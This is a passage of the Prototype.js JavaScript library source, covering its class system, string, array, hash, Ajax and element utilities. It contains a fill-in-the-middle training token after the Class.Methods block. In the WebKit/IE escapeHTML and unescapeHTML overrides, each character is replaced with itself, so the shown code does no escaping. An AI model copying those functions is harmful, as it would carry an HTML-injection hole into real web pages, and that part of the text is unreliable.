klass.subclasses = [];
if (parent) {
var subclass = function() { };
subclass.prototype = parent.prototype;
klass.prototype = new subclass;
parent.subclasses.push(klass);
}
for (var i = 0; i < properties.length; i++)
klass.addMethods(properties[i]);
if (!klass.prototype.initialize)
klass.prototype.initialize = Prototype.emptyFunction;
klass.prototype.constructor = klass;
return klass;
}
};
Class.Methods = {
addMethods: function(source) {
var ancestor = this.superclass && this.superclass.prototype;
var properties = Object.keys(source);
if (!Object.keys({ toString: true }).length)
properties.push("toString", "valueOf");
for (var i = 0, length = properties.length; i < length; i++) {
var property = properties[i], value = source[property];
if (ancestor && Object.isFunction(value) &&
value.argumentNames().first() == "$super") {
var method = value, value = Object.extend((function(m) {
return function() { return ancestor[m].apply(this, arguments) };
})(property).wrap(method), {
valueOf: function() { return method },
toString: function() { return method.toString() }
});
}
this.prototype[property] = value;
}
return this;
}
};<|fim▁hole|>Object.extend = function(destination, source) {
for (var property in source)
destination[property] = source[property];
return destination;
};
Object.extend(Object, {
inspect: function(object) {
try {
if (object === undefined) return 'undefined';
if (object === null) return 'null';
return object.inspect ? object.inspect() : object.toString();
} catch (e) {
if (e instanceof RangeError) return '...';
throw e;
}
},
toJSON: function(object) {
var type = typeof object;
switch (type) {
case 'undefined':
case 'function':
case 'unknown': return;
case 'boolean': return object.toString();
}
if (object === null) return 'null';
if (object.toJSON) return object.toJSON();
if (Object.isElement(object)) return;
var results = [];
for (var property in object) {
var value = Object.toJSON(object[property]);
if (value !== undefined)
results.push(property.toJSON() + ': ' + value);
}
return '{' + results.join(', ') + '}';
},
toQueryString: function(object) {
return $H(object).toQueryString();
},
toHTML: function(object) {
return object && object.toHTML ? object.toHTML() : String.interpret(object);
},
keys: function(object) {
var keys = [];
for (var property in object)
keys.push(property);
return keys;
},
values: function(object) {
var values = [];
for (var property in object)
values.push(object[property]);
return values;
},
clone: function(object) {
return Object.extend({ }, object);
},
isElement: function(object) {
return object && object.nodeType == 1;
},
isArray: function(object) {
return object && object.constructor === Array;
},
isHash: function(object) {
return object instanceof Hash;
},
isFunction: function(object) {
return typeof object == "function";
},
isString: function(object) {
return typeof object == "string";
},
isNumber: function(object) {
return typeof object == "number";
},
isUndefined: function(object) {
return typeof object == "undefined";
}
});
Object.extend(Function.prototype, {
argumentNames: function() {
var names = this.toString().match(/^[\s\(]*function[^(]*\((.*?)\)/)[1].split(",").invoke("strip");
return names.length == 1 && !names[0] ? [] : names;
},
bind: function() {
if (arguments.length < 2 && arguments[0] === undefined) return this;
var __method = this, args = $A(arguments), object = args.shift();
return function() {
return __method.apply(object, args.concat($A(arguments)));
}
},
bindAsEventListener: function() {
var __method = this, args = $A(arguments), object = args.shift();
return function(event) {
return __method.apply(object, [event || window.event].concat(args));
}
},
curry: function() {
if (!arguments.length) return this;
var __method = this, args = $A(arguments);
return function() {
return __method.apply(this, args.concat($A(arguments)));
}
},
delay: function() {
var __method = this, args = $A(arguments), timeout = args.shift() * 1000;
return window.setTimeout(function() {
return __method.apply(__method, args);
}, timeout);
},
wrap: function(wrapper) {
var __method = this;
return function() {
return wrapper.apply(this, [__method.bind(this)].concat($A(arguments)));
}
},
methodize: function() {
if (this._methodized) return this._methodized;
var __method = this;
return this._methodized = function() {
return __method.apply(null, [this].concat($A(arguments)));
};
}
});
Function.prototype.defer = Function.prototype.delay.curry(0.01);
Date.prototype.toJSON = function() {
return '"' + this.getUTCFullYear() + '-' +
(this.getUTCMonth() + 1).toPaddedString(2) + '-' +
this.getUTCDate().toPaddedString(2) + 'T' +
this.getUTCHours().toPaddedString(2) + ':' +
this.getUTCMinutes().toPaddedString(2) + ':' +
this.getUTCSeconds().toPaddedString(2) + 'Z"';
};
var Try = {
these: function() {
var returnValue;
for (var i = 0, length = arguments.length; i < length; i++) {
var lambda = arguments[i];
try {
returnValue = lambda();
break;
} catch (e) { }
}
return returnValue;
}
};
RegExp.prototype.match = RegExp.prototype.test;
RegExp.escape = function(str) {
return String(str).replace(/([.*+?^=!:${}()|[\]\/\\])/g, '\\$1');
};
/*--------------------------------------------------------------------------*/
var PeriodicalExecuter = Class.create({
initialize: function(callback, frequency) {
this.callback = callback;
this.frequency = frequency;
this.currentlyExecuting = false;
this.registerCallback();
},
registerCallback: function() {
this.timer = setInterval(this.onTimerEvent.bind(this), this.frequency * 1000);
},
execute: function() {
this.callback(this);
},
stop: function() {
if (!this.timer) return;
clearInterval(this.timer);
this.timer = null;
},
onTimerEvent: function() {
if (!this.currentlyExecuting) {
try {
this.currentlyExecuting = true;
this.execute();
} finally {
this.currentlyExecuting = false;
}
}
}
});
Object.extend(String, {
interpret: function(value) {
return value == null ? '' : String(value);
},
specialChar: {
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'\\': '\\\\'
}
});
Object.extend(String.prototype, {
gsub: function(pattern, replacement) {
var result = '', source = this, match;
replacement = arguments.callee.prepareReplacement(replacement);
while (source.length > 0) {
if (match = source.match(pattern)) {
result += source.slice(0, match.index);
result += String.interpret(replacement(match));
source = source.slice(match.index + match[0].length);
} else {
result += source, source = '';
}
}
return result;
},
sub: function(pattern, replacement, count) {
replacement = this.gsub.prepareReplacement(replacement);
count = count === undefined ? 1 : count;
return this.gsub(pattern, function(match) {
if (--count < 0) return match[0];
return replacement(match);
});
},
scan: function(pattern, iterator) {
this.gsub(pattern, iterator);
return String(this);
},
truncate: function(length, truncation) {
length = length || 30;
truncation = truncation === undefined ? '...' : truncation;
return this.length > length ?
this.slice(0, length - truncation.length) + truncation : String(this);
},
strip: function() {
return this.replace(/^\s+/, '').replace(/\s+$/, '');
},
stripTags: function() {
return this.replace(/<\/?[^>]+>/gi, '');
},
stripScripts: function() {
return this.replace(new RegExp(Prototype.ScriptFragment, 'img'), '');
},
extractScripts: function() {
var matchAll = new RegExp(Prototype.ScriptFragment, 'img');
var matchOne = new RegExp(Prototype.ScriptFragment, 'im');
return (this.match(matchAll) || []).map(function(scriptTag) {
return (scriptTag.match(matchOne) || ['', ''])[1];
});
},
evalScripts: function() {
return this.extractScripts().map(function(script) { return eval(script) });
},
escapeHTML: function() {
var self = arguments.callee;
self.text.data = this;
return self.div.innerHTML;
},
unescapeHTML: function() {
var div = new Element('div');
div.innerHTML = this.stripTags();
return div.childNodes[0] ? (div.childNodes.length > 1 ?
$A(div.childNodes).inject('', function(memo, node) { return memo+node.nodeValue }) :
div.childNodes[0].nodeValue) : '';
},
toQueryParams: function(separator) {
var match = this.strip().match(/([^?#]*)(#.*)?$/);
if (!match) return { };
return match[1].split(separator || '&').inject({ }, function(hash, pair) {
if ((pair = pair.split('='))[0]) {
var key = decodeURIComponent(pair.shift());
var value = pair.length > 1 ? pair.join('=') : pair[0];
if (value != undefined) value = decodeURIComponent(value);
if (key in hash) {
if (!Object.isArray(hash[key])) hash[key] = [hash[key]];
hash[key].push(value);
}
else hash[key] = value;
}
return hash;
});
},
toArray: function() {
return this.split('');
},
succ: function() {
return this.slice(0, this.length - 1) +
String.fromCharCode(this.charCodeAt(this.length - 1) + 1);
},
times: function(count) {
return count < 1 ? '' : new Array(count + 1).join(this);
},
camelize: function() {
var parts = this.split('-'), len = parts.length;
if (len == 1) return parts[0];
var camelized = this.charAt(0) == '-'
? parts[0].charAt(0).toUpperCase() + parts[0].substring(1)
: parts[0];
for (var i = 1; i < len; i++)
camelized += parts[i].charAt(0).toUpperCase() + parts[i].substring(1);
return camelized;
},
capitalize: function() {
return this.charAt(0).toUpperCase() + this.substring(1).toLowerCase();
},
underscore: function() {
return this.gsub(/::/, '/').gsub(/([A-Z]+)([A-Z][a-z])/,'#{1}_#{2}').gsub(/([a-z\d])([A-Z])/,'#{1}_#{2}').gsub(/-/,'_').toLowerCase();
},
dasherize: function() {
return this.gsub(/_/,'-');
},
inspect: function(useDoubleQuotes) {
var escapedString = this.gsub(/[\x00-\x1f\\]/, function(match) {
var character = String.specialChar[match[0]];
return character ? character : '\\u00' + match[0].charCodeAt().toPaddedString(2, 16);
});
if (useDoubleQuotes) return '"' + escapedString.replace(/"/g, '\\"') + '"';
return "'" + escapedString.replace(/'/g, '\\\'') + "'";
},
toJSON: function() {
return this.inspect(true);
},
unfilterJSON: function(filter) {
return this.sub(filter || Prototype.JSONFilter, '#{1}');
},
isJSON: function() {
var str = this.replace(/\\./g, '@').replace(/"[^"\\\n\r]*"/g, '');
return (/^[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]*$/).test(str);
},
evalJSON: function(sanitize) {
var json = this.unfilterJSON();
try {
if (!sanitize || json.isJSON()) return eval('(' + json + ')');
} catch (e) { }
throw new SyntaxError('Badly formed JSON string: ' + this.inspect());
},
include: function(pattern) {
return this.indexOf(pattern) > -1;
},
startsWith: function(pattern) {
return this.indexOf(pattern) === 0;
},
endsWith: function(pattern) {
var d = this.length - pattern.length;
return d >= 0 && this.lastIndexOf(pattern) === d;
},
empty: function() {
return this == '';
},
blank: function() {
return /^\s*$/.test(this);
},
interpolate: function(object, pattern) {
return new Template(this, pattern).evaluate(object);
}
});
if (Prototype.Browser.WebKit || Prototype.Browser.IE) Object.extend(String.prototype, {
escapeHTML: function() {
return this.replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>');
},
unescapeHTML: function() {
return this.replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>');
}
});
String.prototype.gsub.prepareReplacement = function(replacement) {
if (Object.isFunction(replacement)) return replacement;
var template = new Template(replacement);
return function(match) { return template.evaluate(match) };
};
String.prototype.parseQuery = String.prototype.toQueryParams;
Object.extend(String.prototype.escapeHTML, {
div: document.createElement('div'),
text: document.createTextNode('')
});
with (String.prototype.escapeHTML) div.appendChild(text);
var Template = Class.create({
initialize: function(template, pattern) {
this.template = template.toString();
this.pattern = pattern || Template.Pattern;
},
evaluate: function(object) {
if (Object.isFunction(object.toTemplateReplacements))
object = object.toTemplateReplacements();
return this.template.gsub(this.pattern, function(match) {
if (object == null) return '';
var before = match[1] || '';
if (before == '\\') return match[2];
var ctx = object, expr = match[3];
var pattern = /^([^.[]+|\[((?:.*?[^\\])?)\])(\.|\[|$)/, match = pattern.exec(expr);
if (match == null) return before;
while (match != null) {
var comp = match[1].startsWith('[') ? match[2].gsub('\\\\]', ']') : match[1];
ctx = ctx[comp];
if (null == ctx || '' == match[3]) break;
expr = expr.substring('[' == match[3] ? match[1].length : match[0].length);
match = pattern.exec(expr);
}
return before + String.interpret(ctx);
}.bind(this));
}
});
Template.Pattern = /(^|.|\r|\n)(#\{(.*?)\})/;
var $break = { };
var Enumerable = {
each: function(iterator, context) {
var index = 0;
iterator = iterator.bind(context);
try {
this._each(function(value) {
iterator(value, index++);
});
} catch (e) {
if (e != $break) throw e;
}
return this;
},
eachSlice: function(number, iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var index = -number, slices = [], array = this.toArray();
while ((index += number) < array.length)
slices.push(array.slice(index, index+number));
return slices.collect(iterator, context);
},
all: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result = true;
this.each(function(value, index) {
result = result && !!iterator(value, index);
if (!result) throw $break;
});
return result;
},
any: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result = false;
this.each(function(value, index) {
if (result = !!iterator(value, index))
throw $break;
});
return result;
},
collect: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var results = [];
this.each(function(value, index) {
results.push(iterator(value, index));
});
return results;
},
detect: function(iterator, context) {
iterator = iterator.bind(context);
var result;
this.each(function(value, index) {
if (iterator(value, index)) {
result = value;
throw $break;
}
});
return result;
},
findAll: function(iterator, context) {
iterator = iterator.bind(context);
var results = [];
this.each(function(value, index) {
if (iterator(value, index))
results.push(value);
});
return results;
},
grep: function(filter, iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var results = [];
if (Object.isString(filter))
filter = new RegExp(filter);
this.each(function(value, index) {
if (filter.match(value))
results.push(iterator(value, index));
});
return results;
},
include: function(object) {
if (Object.isFunction(this.indexOf))
if (this.indexOf(object) != -1) return true;
var found = false;
this.each(function(value) {
if (value == object) {
found = true;
throw $break;
}
});
return found;
},
inGroupsOf: function(number, fillWith) {
fillWith = fillWith === undefined ? null : fillWith;
return this.eachSlice(number, function(slice) {
while(slice.length < number) slice.push(fillWith);
return slice;
});
},
inject: function(memo, iterator, context) {
iterator = iterator.bind(context);
this.each(function(value, index) {
memo = iterator(memo, value, index);
});
return memo;
},
invoke: function(method) {
var args = $A(arguments).slice(1);
return this.map(function(value) {
return value[method].apply(value, args);
});
},
max: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result;
this.each(function(value, index) {
value = iterator(value, index);
if (result == undefined || value >= result)
result = value;
});
return result;
},
min: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result;
this.each(function(value, index) {
value = iterator(value, index);
if (result == undefined || value < result)
result = value;
});
return result;
},
partition: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var trues = [], falses = [];
this.each(function(value, index) {
(iterator(value, index) ?
trues : falses).push(value);
});
return [trues, falses];
},
pluck: function(property) {
var results = [];
this.each(function(value) {
results.push(value[property]);
});
return results;
},
reject: function(iterator, context) {
iterator = iterator.bind(context);
var results = [];
this.each(function(value, index) {
if (!iterator(value, index))
results.push(value);
});
return results;
},
sortBy: function(iterator, context) {
iterator = iterator.bind(context);
return this.map(function(value, index) {
return {value: value, criteria: iterator(value, index)};
}).sort(function(left, right) {
var a = left.criteria, b = right.criteria;
return a < b ? -1 : a > b ? 1 : 0;
}).pluck('value');
},
toArray: function() {
return this.map();
},
zip: function() {
var iterator = Prototype.K, args = $A(arguments);
if (Object.isFunction(args.last()))
iterator = args.pop();
var collections = [this].concat(args).map($A);
return this.map(function(value, index) {
return iterator(collections.pluck(index));
});
},
size: function() {
return this.toArray().length;
},
inspect: function() {
return '#<Enumerable:' + this.toArray().inspect() + '>';
}
};
Object.extend(Enumerable, {
map: Enumerable.collect,
find: Enumerable.detect,
select: Enumerable.findAll,
filter: Enumerable.findAll,
member: Enumerable.include,
entries: Enumerable.toArray,
every: Enumerable.all,
some: Enumerable.any
});
function $A(iterable) {
if (!iterable) return [];
if (iterable.toArray) return iterable.toArray();
var length = iterable.length, results = new Array(length);
while (length--) results[length] = iterable[length];
return results;
}
if (Prototype.Browser.WebKit) {
function $A(iterable) {
if (!iterable) return [];
if (!(Object.isFunction(iterable) && iterable == '[object NodeList]') &&
iterable.toArray) return iterable.toArray();
var length = iterable.length, results = new Array(length);
while (length--) results[length] = iterable[length];
return results;
}
}
Array.from = $A;
Object.extend(Array.prototype, Enumerable);
if (!Array.prototype._reverse) Array.prototype._reverse = Array.prototype.reverse;
Object.extend(Array.prototype, {
_each: function(iterator) {
for (var i = 0, length = this.length; i < length; i++)
iterator(this[i]);
},
clear: function() {
this.length = 0;
return this;
},
first: function() {
return this[0];
},
last: function() {
return this[this.length - 1];
},
compact: function() {
return this.select(function(value) {
return value != null;
});
},
flatten: function() {
return this.inject([], function(array, value) {
return array.concat(Object.isArray(value) ?
value.flatten() : [value]);
});
},
without: function() {
var values = $A(arguments);
return this.select(function(value) {
return !values.include(value);
});
},
reverse: function(inline) {
return (inline !== false ? this : this.toArray())._reverse();
},
reduce: function() {
return this.length > 1 ? this : this[0];
},
uniq: function(sorted) {
return this.inject([], function(array, value, index) {
if (0 == index || (sorted ? array.last() != value : !array.include(value)))
array.push(value);
return array;
});
},
intersect: function(array) {
return this.uniq().findAll(function(item) {
return array.detect(function(value) { return item === value });
});
},
clone: function() {
return [].concat(this);
},
size: function() {
return this.length;
},
inspect: function() {
return '[' + this.map(Object.inspect).join(', ') + ']';
},
toJSON: function() {
var results = [];
this.each(function(object) {
var value = Object.toJSON(object);
if (value !== undefined) results.push(value);
});
return '[' + results.join(', ') + ']';
}
});
// use native browser JS 1.6 implementation if available
if (Object.isFunction(Array.prototype.forEach))
Array.prototype._each = Array.prototype.forEach;
if (!Array.prototype.indexOf) Array.prototype.indexOf = function(item, i) {
i || (i = 0);
var length = this.length;
if (i < 0) i = length + i;
for (; i < length; i++)
if (this[i] === item) return i;
return -1;
};
if (!Array.prototype.lastIndexOf) Array.prototype.lastIndexOf = function(item, i) {
i = isNaN(i) ? this.length : (i < 0 ? this.length + i : i) + 1;
var n = this.slice(0, i).reverse().indexOf(item);
return (n < 0) ? n : i - n - 1;
};
Array.prototype.toArray = Array.prototype.clone;
function $w(string) {
if (!Object.isString(string)) return [];
string = string.strip();
return string ? string.split(/\s+/) : [];
}
if (Prototype.Browser.Opera){
Array.prototype.concat = function() {
var array = [];
for (var i = 0, length = this.length; i < length; i++) array.push(this[i]);
for (var i = 0, length = arguments.length; i < length; i++) {
if (Object.isArray(arguments[i])) {
for (var j = 0, arrayLength = arguments[i].length; j < arrayLength; j++)
array.push(arguments[i][j]);
} else {
array.push(arguments[i]);
}
}
return array;
};
}
Object.extend(Number.prototype, {
toColorPart: function() {
return this.toPaddedString(2, 16);
},
succ: function() {
return this + 1;
},
times: function(iterator) {
$R(0, this, true).each(iterator);
return this;
},
toPaddedString: function(length, radix) {
var string = this.toString(radix || 10);
return '0'.times(length - string.length) + string;
},
toJSON: function() {
return isFinite(this) ? this.toString() : 'null';
}
});
$w('abs round ceil floor').each(function(method){
Number.prototype[method] = Math[method].methodize();
});
function $H(object) {
return new Hash(object);
}
var Hash = Class.create(Enumerable, (function() {
if (function() {
var i = 0, Test = function(value) { this.key = value };
Test.prototype.key = 'foo';
for (var property in new Test('bar')) i++;
return i > 1;
}()) {
function each(iterator) {
var cache = [];
for (var key in this._object) {
var value = this._object[key];
if (cache.include(key)) continue;
cache.push(key);
var pair = [key, value];
pair.key = key;
pair.value = value;
iterator(pair);
}
}
} else {
function each(iterator) {
for (var key in this._object) {
var value = this._object[key], pair = [key, value];
pair.key = key;
pair.value = value;
iterator(pair);
}
}
}
function toQueryPair(key, value) {
if (Object.isUndefined(value)) return key;
return key + '=' + encodeURIComponent(String.interpret(value));
}
return {
initialize: function(object) {
this._object = Object.isHash(object) ? object.toObject() : Object.clone(object);
},
_each: each,
set: function(key, value) {
return this._object[key] = value;
},
get: function(key) {
return this._object[key];
},
unset: function(key) {
var value = this._object[key];
delete this._object[key];
return value;
},
toObject: function() {
return Object.clone(this._object);
},
keys: function() {
return this.pluck('key');
},
values: function() {
return this.pluck('value');
},
index: function(value) {
var match = this.detect(function(pair) {
return pair.value === value;
});
return match && match.key;
},
merge: function(object) {
return this.clone().update(object);
},
update: function(object) {
return new Hash(object).inject(this, function(result, pair) {
result.set(pair.key, pair.value);
return result;
});
},
toQueryString: function() {
return this.map(function(pair) {
var key = encodeURIComponent(pair.key), values = pair.value;
if (values && typeof values == 'object') {
if (Object.isArray(values))
return values.map(toQueryPair.curry(key)).join('&');
}
return toQueryPair(key, values);
}).join('&');
},
inspect: function() {
return '#<Hash:{' + this.map(function(pair) {
return pair.map(Object.inspect).join(': ');
}).join(', ') + '}>';
},
toJSON: function() {
return Object.toJSON(this.toObject());
},
clone: function() {
return new Hash(this);
}
}
})());
Hash.prototype.toTemplateReplacements = Hash.prototype.toObject;
Hash.from = $H;
var ObjectRange = Class.create(Enumerable, {
initialize: function(start, end, exclusive) {
this.start = start;
this.end = end;
this.exclusive = exclusive;
},
_each: function(iterator) {
var value = this.start;
while (this.include(value)) {
iterator(value);
value = value.succ();
}
},
include: function(value) {
if (value < this.start)
return false;
if (this.exclusive)
return value < this.end;
return value <= this.end;
}
});
var $R = function(start, end, exclusive) {
return new ObjectRange(start, end, exclusive);
};
var Ajax = {
getTransport: function() {
return Try.these(
function() {return new XMLHttpRequest()},
function() {return new ActiveXObject('Msxml2.XMLHTTP')},
function() {return new ActiveXObject('Microsoft.XMLHTTP')}
) || false;
},
activeRequestCount: 0
};
Ajax.Responders = {
responders: [],
_each: function(iterator) {
this.responders._each(iterator);
},
register: function(responder) {
if (!this.include(responder))
this.responders.push(responder);
},
unregister: function(responder) {
this.responders = this.responders.without(responder);
},
dispatch: function(callback, request, transport, json) {
this.each(function(responder) {
if (Object.isFunction(responder[callback])) {
try {
responder[callback].apply(responder, [request, transport, json]);
} catch (e) { }
}
});
}
};
Object.extend(Ajax.Responders, Enumerable);
Ajax.Responders.register({
onCreate: function() { Ajax.activeRequestCount++ },
onComplete: function() { Ajax.activeRequestCount-- }
});
Ajax.Base = Class.create({
initialize: function(options) {
this.options = {
method: 'post',
asynchronous: true,
contentType: 'application/x-www-form-urlencoded',
encoding: 'UTF-8',
parameters: '',
evalJSON: true,
evalJS: true
};
Object.extend(this.options, options || { });
this.options.method = this.options.method.toLowerCase();
if (Object.isString(this.options.parameters))
this.options.parameters = this.options.parameters.toQueryParams();
}
});
Ajax.Request = Class.create(Ajax.Base, {
_complete: false,
initialize: function($super, url, options) {
$super(options);
this.transport = Ajax.getTransport();
this.request(url);
},
request: function(url) {
this.url = url;
this.method = this.options.method;
var params = Object.clone(this.options.parameters);
if (!['get', 'post'].include(this.method)) {
// simulate other verbs over post
params['_method'] = this.method;
this.method = 'post';
}
this.parameters = params;
if (params = Object.toQueryString(params)) {
// when GET, append parameters to URL
if (this.method == 'get')
this.url += (this.url.include('?') ? '&' : '?') + params;
else if (/Konqueror|Safari|KHTML/.test(navigator.userAgent))
params += '&_=';
}
try {
var response = new Ajax.Response(this);
if (this.options.onCreate) this.options.onCreate(response);
Ajax.Responders.dispatch('onCreate', this, response);
this.transport.open(this.method.toUpperCase(), this.url,
this.options.asynchronous);
if (this.options.asynchronous) this.respondToReadyState.bind(this).defer(1);
this.transport.onreadystatechange = this.onStateChange.bind(this);
this.setRequestHeaders();
this.body = this.method == 'post' ? (this.options.postBody || params) : null;
this.transport.send(this.body);
/* Force Firefox to handle ready state 4 for synchronous requests */
if (!this.options.asynchronous && this.transport.overrideMimeType)
this.onStateChange();
}
catch (e) {
this.dispatchException(e);
}
},
onStateChange: function() {
var readyState = this.transport.readyState;
if (readyState > 1 && !((readyState == 4) && this._complete))
this.respondToReadyState(this.transport.readyState);
},
setRequestHeaders: function() {
var headers = {
'X-Requested-With': 'XMLHttpRequest',
'X-Prototype-Version': Prototype.Version,
'Accept': 'text/javascript, text/html, application/xml, text/xml, */*'
};
if (this.method == 'post') {
headers['Content-type'] = this.options.contentType +
(this.options.encoding ? '; charset=' + this.options.encoding : '');
/* Force "Connection: close" for older Mozilla browsers to work
* around a bug where XMLHttpRequest sends an incorrect
* Content-length header. See Mozilla Bugzilla #246651.
*/
if (this.transport.overrideMimeType &&
(navigator.userAgent.match(/Gecko\/(\d{4})/) || [0,2005])[1] < 2005)
headers['Connection'] = 'close';
}
// user-defined headers
if (typeof this.options.requestHeaders == 'object') {
var extras = this.options.requestHeaders;
if (Object.isFunction(extras.push))
for (var i = 0, length = extras.length; i < length; i += 2)
headers[extras[i]] = extras[i+1];
else
$H(extras).each(function(pair) { headers[pair.key] = pair.value });
}
for (var name in headers)
this.transport.setRequestHeader(name, headers[name]);
},
success: function() {
var status = this.getStatus();
return !status || (status >= 200 && status < 300);
},
getStatus: function() {
try {
return this.transport.status || 0;
} catch (e) { return 0 }
},
respondToReadyState: function(readyState) {
var state = Ajax.Request.Events[readyState], response = new Ajax.Response(this);
if (state == 'Complete') {
try {
this._complete = true;
(this.options['on' + response.status]
|| this.options['on' + (this.success() ? 'Success' : 'Failure')]
|| Prototype.emptyFunction)(response, response.headerJSON);
} catch (e) {
this.dispatchException(e);
}
var contentType = response.getHeader('Content-type');
if (this.options.evalJS == 'force'
|| (this.options.evalJS && contentType
&& contentType.match(/^\s*(text|application)\/(x-)?(java|ecma)script(;.*)?\s*$/i)))
this.evalResponse();
}
try {
(this.options['on' + state] || Prototype.emptyFunction)(response, response.headerJSON);
Ajax.Responders.dispatch('on' + state, this, response, response.headerJSON);
} catch (e) {
this.dispatchException(e);
}
if (state == 'Complete') {
// avoid memory leak in MSIE: clean up
this.transport.onreadystatechange = Prototype.emptyFunction;
}
},
getHeader: function(name) {
try {
return this.transport.getResponseHeader(name);
} catch (e) { return null }
},
evalResponse: function() {
try {
return eval((this.transport.responseText || '').unfilterJSON());
} catch (e) {
this.dispatchException(e);
}
},
dispatchException: function(exception) {
(this.options.onException || Prototype.emptyFunction)(this, exception);
Ajax.Responders.dispatch('onException', this, exception);
}
});
Ajax.Request.Events =
['Uninitialized', 'Loading', 'Loaded', 'Interactive', 'Complete'];
Ajax.Response = Class.create({
initialize: function(request){
this.request = request;
var transport = this.transport = request.transport,
readyState = this.readyState = transport.readyState;
if((readyState > 2 && !Prototype.Browser.IE) || readyState == 4) {
this.status = this.getStatus();
this.statusText = this.getStatusText();
this.responseText = String.interpret(transport.responseText);
this.headerJSON = this._getHeaderJSON();
}
if(readyState == 4) {
var xml = transport.responseXML;
this.responseXML = xml === undefined ? null : xml;
this.responseJSON = this._getResponseJSON();
}
},
status: 0,
statusText: '',
getStatus: Ajax.Request.prototype.getStatus,
getStatusText: function() {
try {
return this.transport.statusText || '';
} catch (e) { return '' }
},
getHeader: Ajax.Request.prototype.getHeader,
getAllHeaders: function() {
try {
return this.getAllResponseHeaders();
} catch (e) { return null }
},
getResponseHeader: function(name) {
return this.transport.getResponseHeader(name);
},
getAllResponseHeaders: function() {
return this.transport.getAllResponseHeaders();
},
_getHeaderJSON: function() {
var json = this.getHeader('X-JSON');
if (!json) return null;
json = decodeURIComponent(escape(json));
try {
return json.evalJSON(this.request.options.sanitizeJSON);
} catch (e) {
this.request.dispatchException(e);
}
},
_getResponseJSON: function() {
var options = this.request.options;
if (!options.evalJSON || (options.evalJSON != 'force' &&
!(this.getHeader('Content-type') || '').include('application/json')))
return null;
try {
return this.transport.responseText.evalJSON(options.sanitizeJSON);
} catch (e) {
this.request.dispatchException(e);
}
}
});
Ajax.Updater = Class.create(Ajax.Request, {
initialize: function($super, container, url, options) {
this.container = {
success: (container.success || container),
failure: (container.failure || (container.success ? null : container))
};
options = options || { };
var onComplete = options.onComplete;
options.onComplete = (function(response, param) {
this.updateContent(response.responseText);
if (Object.isFunction(onComplete)) onComplete(response, param);
}).bind(this);
$super(url, options);
},
updateContent: function(responseText) {
var receiver = this.container[this.success() ? 'success' : 'failure'],
options = this.options;
if (!options.evalScripts) responseText = responseText.stripScripts();
if (receiver = $(receiver)) {
if (options.insertion) {
if (Object.isString(options.insertion)) {
var insertion = { }; insertion[options.insertion] = responseText;
receiver.insert(insertion);
}
else options.insertion(receiver, responseText);
}
else receiver.update(responseText);
}
if (this.success()) {
if (this.onComplete) this.onComplete.bind(this).defer();
}
}
});
Ajax.PeriodicalUpdater = Class.create(Ajax.Base, {
initialize: function($super, container, url, options) {
$super(options);
this.onComplete = this.options.onComplete;
this.frequency = (this.options.frequency || 2);
this.decay = (this.options.decay || 1);
this.updater = { };
this.container = container;
this.url = url;
this.start();
},
start: function() {
this.options.onComplete = this.updateComplete.bind(this);
this.onTimerEvent();
},
stop: function() {
this.updater.options.onComplete = undefined;
clearTimeout(this.timer);
(this.onComplete || Prototype.emptyFunction).apply(this, arguments);
},
updateComplete: function(response) {
if (this.options.decay) {
this.decay = (response.responseText == this.lastText ?
this.decay * this.options.decay : 1);
this.lastText = response.responseText;
}
this.timer = this.onTimerEvent.bind(this).delay(this.decay * this.frequency);
},
onTimerEvent: function() {
this.updater = new Ajax.Updater(this.container, this.url, this.options);
}
});
function $(element) {
if (arguments.length > 1) {
for (var i = 0, elements = [], length = arguments.length; i < length; i++)
elements.push($(arguments[i]));
return elements;
}
if (Object.isString(element))
element = document.getElementById(element);
return Element.extend(element);
}
if (Prototype.BrowserFeatures.XPath) {
document._getElementsByXPath = function(expression, parentElement) {
var results = [];
var query = document.evaluate(expression, $(parentElement) || document,
null, XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);
for (var i = 0, length = query.snapshotLength; i < length; i++)
results.push(Element.extend(query.snapshotItem(i)));
return results;
};
}
/*--------------------------------------------------------------------------*/
if (!window.Node) var Node = { };
if (!Node.ELEMENT_NODE) {
// DOM level 2 ECMAScript Language Binding
Object.extend(Node, {
ELEMENT_NODE: 1,
ATTRIBUTE_NODE: 2,
TEXT_NODE: 3,
CDATA_SECTION_NODE: 4,
ENTITY_REFERENCE_NODE: 5,
ENTITY_NODE: 6,
PROCESSING_INSTRUCTION_NODE: 7,
COMMENT_NODE: 8,
DOCUMENT_NODE: 9,
DOCUMENT_TYPE_NODE: 10,
DOCUMENT_FRAGMENT_NODE: 11,
NOTATION_NODE: 12
});
}
(function() {
var element = this.Element;
this.Element = function(tagName, attributes) {
attributes = attributes || { };
tagName = tagName.toLowerCase();
var cache = Element.cache;
if (Prototype.Browser.IE && attributes.name) {
tagName = '<' + tagName + ' name="' + attributes.name + '">';
delete attributes.name;
return Element.writeAttribute(document.createElement(tagName), attributes);
}
if (!cache[tagName]) cache[tagName] = Element.extend(document.createElement(tagName));
return Element.writeAttribute(cache[tagName].cloneNode(false), attributes);
};
Object.extend(this.Element, element || { });
}).call(window);
Element.cache = { };
Element.Methods = {
visible: function(element) {
return $(element).style.display != 'none';
},
toggle: function(element) {
element = $(element);
Element[Element.visible(element) ? 'hide' : 'show'](element);
return element;
},
hide: function(element) {
$(element).style.display = 'none';
return element;
},
show: function(element) {
$(element).style.display = '';
return element;
},
remove: function(element) {
element = $(element);
element.parentNode.removeChild(element);
return element;
},
update: function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) return element.update().insert(content);
content = Object.toHTML(content);
element.innerHTML = content.stripScripts();
content.evalScripts.bind(content).defer();
return element;
},
replace: function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
else if (!Object.isElement(content)) {
content = Object.toHTML(content);
